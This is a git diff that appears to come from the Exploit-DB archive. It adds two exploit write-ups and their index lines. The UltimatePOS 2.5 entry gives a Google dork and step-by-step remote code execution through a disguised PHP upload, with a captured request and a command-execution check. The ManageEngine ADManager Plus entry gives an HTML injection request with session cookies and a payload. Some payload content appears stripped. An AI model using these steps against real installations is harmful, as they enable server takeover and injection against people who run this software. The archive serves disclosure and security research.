diff --git a/exploits/php/webapps/45253.txt b/exploits/php/webapps/45253.txt
new file mode 100644
index 000000000..d4a1d70bb
--- /dev/null
+++ b/exploits/php/webapps/45253.txt
@@ -0,0 +1,64 @@
+# Exploit Title: UltimatePOS 2.5 - Remote Code Execution
+# Google Dork: intext:"UltimatePOS"
+# Date: 2018-08-22
+# Exploit Author: Renos Nikolaou
+# Vendor Homepage: http://ultimatefosters.com/
+# Software Link: https://codecanyon.net/item/saas-superadmin-module-for-ultimatepos-advance/22394431
+# Version: 2.5
+# Tested on: Windows 10
+# CVE: N/A
+# Description : UltimatePOS 2.5 allows users to upload arbitrary files which
+# leads to a remote command execution on the remote server.
+
+# PoC
+# 1) Create a file with the below PHP code and save it as jpg
+
+
+
+# 2) Login to UltimatePOS portal as low priviliage user
+# 3) At the left hand side go to Products --> List Products ( http://domain/products )
+# 4) Click at the Actions button of a current product --> Edit
+# (NOTE: Attack works if you add new product as well)
+# 5) Under Product image: click Browse and upload your jpg file containing the PHP code mentioned at step 1.
+# (Make sure to use proxy like Burp, Fiddler etc..etc)
+# 6) Scroll Down, click Update and Intercept the request using proxy
+# 7) Forward the requests until you reach the from request containing the product details
+# (See the request below) including the filename of the file that you have uploaded.
+# 8) Edit the filename from filename.jpg to filename.php and then release the Interception.
+# 9) Go to the List Products again (Step 3) and fine the product that you have edited.
+# 10) Right click at the Product image and select Copy image Location
+# 11) Paste the URL into your browser. Will be similar to: http://domain/storage/img/1533988576_cmd.php
+# 12) Verify the exploit: http://domain/storage/img/1533988576_cmd.php?cmd=id
+
+
+# The request:
+===================
+
+POST /products/64 HTTP/1.1
+Host: domain.com
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:52.0) Gecko/20100101 Firefox/52.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Referer: http://domain.com/products/64/edit
+Cookie:
+Connection: close
+Upgrade-Insecure-Requests: 1
+Content-Type: multipart/form-data; boundary=---------------------------3062816822434
+Content-Length: 2868
+
+...
+
+50
+-----------------------------3062816822434
+Content-Disposition: form-data; name="image"; filename="cmd.php"
+Content-Type: image/jpeg
+
+
+
+-----------------------------3062816822434
+Content-Disposition: form-data; name="weight"
+
+pos_confirmed.PNG
+
+...
\ No newline at end of file
diff --git a/exploits/windows/webapps/45254.txt b/exploits/windows/webapps/45254.txt
new file mode 100644
index 000000000..13b555f1b
--- /dev/null
+++ b/exploits/windows/webapps/45254.txt
@@ -0,0 +1,51 @@
+# Exploit Title: ManageEngine ADManager Plus 6.5.7 - HTML Injection
+# Date: 2018-08-21
+# Exploit Author: Ismail Tasdelen
+# Vendor Homepage: https://www.manageengine.com/
+# Hardware Link : https://www.manageengine.com/products/ad-manager/
+# Software : ZOHO Corp ManageEngine ADManager Plus
+# Product Version: 6.5.7
+# Vulernability Type : Code Injection
+# Vulenrability : HTML Injection
+# CVE : CVE-2018-15608
+
+# ZOHO Corp ManageEngine ADManager Plus 6.5.7 allows HTML Injection on
+# the "AD Delegation" "Help Desk Technicians" screen.
+
+# HTTP Request Header :
+
+Request URL: http://172.16.2.105:8080/ADMPTechnicians.do?methodToCall=listTechnicianRows
+Request Method: POST
+Status Code: 200 OK
+Remote Address: 172.16.2.105:8080
+Referrer Policy: no-referrer-when-downgrade
+Accept: */*
+Accept-Encoding: gzip, deflate
+Accept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7
+Connection: keep-alive
+Content-Length: 301
+Content-type: application/x-www-form-urlencoded;charset=UTF-8
+Cookie: adscsrf=614ff642-779b-41aa-bff5-44370ad770c2; JSESSIONID=79DE1A7AE1DC5B7D88FCBF02AB425987; JSESSIONIDSSO=19AA1682A937F344D1DCB190B31343FB
+Host: 172.16.2.105:8080
+Origin: http://172.16.2.105:8080
+Referer: http://172.16.2.105:8080/Delegation.do?selectedTab=delegation&selectedTile=technicians
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.106 Safari/537.36
+X-Requested-With: XMLHttpRequest
+
+# HTTP Response Header :
+
+Content-Length: 3753
+Content-Type: text/html;charset=UTF-8
+Date: Tue, 14 Aug 2018 10:14:32 GMT
+Server: Apache-Coyote/1.1
+X-Content-Type-Options: nosniff
+X-XSS-Protection: 1
+
+# Query String Parameters :
+
+methodToCall: listTechnicianRows
+
+# Form Data :
+
+params: {"startIndex":1,"range":10,"searchText":"\">

Ismail Tasdelen

","ascending":true,"isNavigation":false,"adminSelected":false,"isNewRange":false,"sortColumn":FULL_NAME,"typeFilters":"","domainFilters":"","viewType":defaultView}
+adscsrf: 614ff642-779b-41aa-bff5-44370ad770c2
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index 63782cc07..b04c64838 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
@@ -39854,3 +39854,5 @@ id,file,description,date,author,type,platform,port
 45247,exploits/php/webapps/45247.txt,"Twitter-Clone 1 - 'code' SQL Injection",2018-08-23,L0RD,webapps,php,
 45248,exploits/windows/webapps/45248.txt,"PCViewer vt1000 - Directory Traversal",2018-08-23,"Berk Dusunur",webapps,windows,
 45252,exploits/hardware/webapps/45252.txt,"Vox TG790 ADSL Router - Cross-Site Request Forgery (Add Admin)",2018-08-24,cakes,webapps,hardware,
+45253,exploits/php/webapps/45253.txt,"UltimatePOS 2.5 - Remote Code Execution",2018-08-25,"Renos Nikolaou",webapps,php,
+45254,exploits/windows/webapps/45254.txt,"ManageEngine ADManager Plus 6.5.7 - HTML Injection",2018-08-25,"Ismail Tasdelen",webapps,windows,